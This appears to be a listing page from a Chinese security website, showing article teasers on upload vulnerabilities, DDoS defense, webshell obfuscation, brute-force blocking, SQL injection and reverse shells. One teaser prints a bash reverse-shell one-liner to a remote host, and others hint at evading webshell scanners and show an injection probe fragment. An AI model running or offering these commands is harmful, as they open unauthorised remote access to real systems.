首页 网络安全 脚本攻防 ( Page 3 )

脚本攻防 137

悠久资源脚本攻防栏目提供网络安全编程之脚本攻防相关的内容资讯,包含XSS 攻击常用脚本,SQL注入攻击(攻击与防范) ,一些常见的PHP后门原理分析等等

网站防范 \”上传漏洞\”入侵的方法

“上传漏洞”入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站,都存在上传漏洞。本文将介绍常见的上传漏洞及其防范技巧。 一、能直接上传asp文件的…

phpddos流量攻击预防方法

这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个ph…

PHP一句话Webshell变形总结

0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形…

脚本防止SSH和vsftpd暴力破解的代码分享

我随便看了看/var/log/secure日志,显示如下: 复制代码代码如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.1…

2023-12-04 989

Python 爬虫使用动态切换ip防止封杀

上次有说过,我在新公司有部分工作是负责爬虫业务的,爬虫机器有上百台,节点也要计划迁入了Docker平台上。 这两天遇到一个棘手的问题,就是因为我们为了追求数据量,在某些机房,用do…

一次奇遇的渗透

作者:y0umer   打开网站发现   习惯的加了一个引号   确定是注入以后直接丢啊D了。(我懒)   这不悲剧了么,猜不出表段??   扫扫目录看看。   发现del.asp…

2023-12-04 710

Linux 下多种编程语言的反弹 shell 方法

bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本:perl -e \'use Socket;$i…

2023-12-07 478

六种后台拿shell的方法

一、直接上传获得 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应…

2023-12-07 1,019

web 页面 一些sql注入语句小结

选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x64006…

2023-12-04 625

Oracle的使用技巧以及脚本代码

1. 如何查看ORACLE的隐含参数?   ORACLE的显式参数,除了在INIT.ORA文件中定义的外,在svrmgrl中用"show parameter *"…

2023-12-04 564